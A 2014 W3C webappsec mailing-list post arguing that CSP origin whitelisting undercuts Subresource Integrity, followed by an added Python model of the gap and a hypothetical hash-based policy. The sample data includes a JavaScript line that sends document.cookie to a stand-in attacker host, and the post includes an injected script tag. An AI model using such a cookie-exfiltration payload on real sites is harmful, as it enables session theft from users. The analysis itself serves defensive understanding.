- From: Frederik Braun <fbraun@mozilla.com>
- Date: Tue, 28 Oct 2014 21:02:21 +0100
- To: "public-webappsec@w3.org" <public-webappsec@w3.org>
Subresource Integrity is supposed to help not having to trust CDNs. The idea is that a compromised JavaScript library on another origin cannot harm the web page. This is in contrast to CSP having to trust the whole origin. If I want to use CSP I am saying "I trust this whole origin". If I want to use SRI I say "I do not trust this origin, but that file is fine".

Having SRI in place means we will put an untrusted origin (it's untrusted - otherwise we wouldn't use SRI?) into the CSP whitelist. Meaning that every file from this untrusted origin is fine. This is a weird contradiction. Assuming XSS and thinking the CDN may indeed become evil, an attacker may just include <script src="https://cdn.example/evil.js"> instead of <script src="https://cdn.example/lib.js" integrity="valid"> and it will work :(

I wonder if this may be solved with CSP hash-src, though hash-src is only for inline scripts, not other-origin scripts. Maybe because of the privacy concerns that this would allow learning the hash of cross-origin resources? This would require CORS-enabled (just like SRI) then.
Received on Tuesday, 28 October 2014 20:02:50 UTC
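The gap described in the mail, modelled as an added example (not code from the mail or from any browser): a CSP host whitelist lets any file from the whitelisted origin load, SRI only checks tags that carry an integrity attribute, and a hypothetical hash-source check for external scripts would close the gap. The CSP host matching is simplified to scheme plus host, and the resource bodies and policy are constructed sample values.

```python
import base64
import hashlib
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample resource bodies standing in for two files on the CDN origin.
LIB = b"window.lib = {version: 1};"
EVIL = b"fetch('https://attacker.invalid/?c=' + document.cookie);"

def sri_digest(body: bytes, alg: str = "sha256") -> str:
    """Integrity metadata for a body, in the 'sha256-<base64>' form SRI uses."""
    return f"{alg}-{base64.b64encode(hashlib.new(alg, body).digest()).decode()}"

def sri_matches(body: bytes, integrity: Optional[str]) -> bool:
    """SRI verdict for one script tag. A tag without an integrity attribute is
    simply not checked, which is why the attacker's untagged <script> passes."""
    if integrity is None:
        return True
    alg = integrity.partition("-")[0]
    return sri_digest(body, alg) == integrity

def csp_host_allows(script_src: List[str], url: str) -> bool:
    """Simplified CSP host-source matching (assumption: scheme://host only,
    no paths or wildcards): every URL on a whitelisted origin is allowed."""
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}" in script_src

def csp_hash_allows(hash_sources: List[str], body: bytes) -> bool:
    """Hypothetical hash-source matching applied to an external script body,
    the extension the mail wonders about (real hash-src covers inline only)."""
    return any(sri_digest(body, h.partition("-")[0]) == h for h in hash_sources)

def loads_under_host_whitelist(tag: dict, body: bytes, script_src: List[str]) -> bool:
    """What a browser does today: CSP whitelist check plus SRI where a tag has it."""
    return csp_host_allows(script_src, tag["src"]) and sri_matches(body, tag.get("integrity"))

def loads_under_hash_policy(tag: dict, body: bytes, hash_sources: List[str]) -> bool:
    """The hypothetical policy: only bodies whose hash is listed may load."""
    return csp_hash_allows(hash_sources, body) and sri_matches(body, tag.get("integrity"))

if __name__ == "__main__":
    policy = ["https://cdn.example"]
    lib_tag = {"src": "https://cdn.example/lib.js", "integrity": sri_digest(LIB)}
    evil_tag = {"src": "https://cdn.example/evil.js"}  # injected tag, no integrity
    print("lib  (whitelist):", loads_under_host_whitelist(lib_tag, LIB, policy))
    print("evil (whitelist):", loads_under_host_whitelist(evil_tag, EVIL, policy))
    print("evil (hash policy):", loads_under_hash_policy(evil_tag, EVIL, [sri_digest(LIB)]))
```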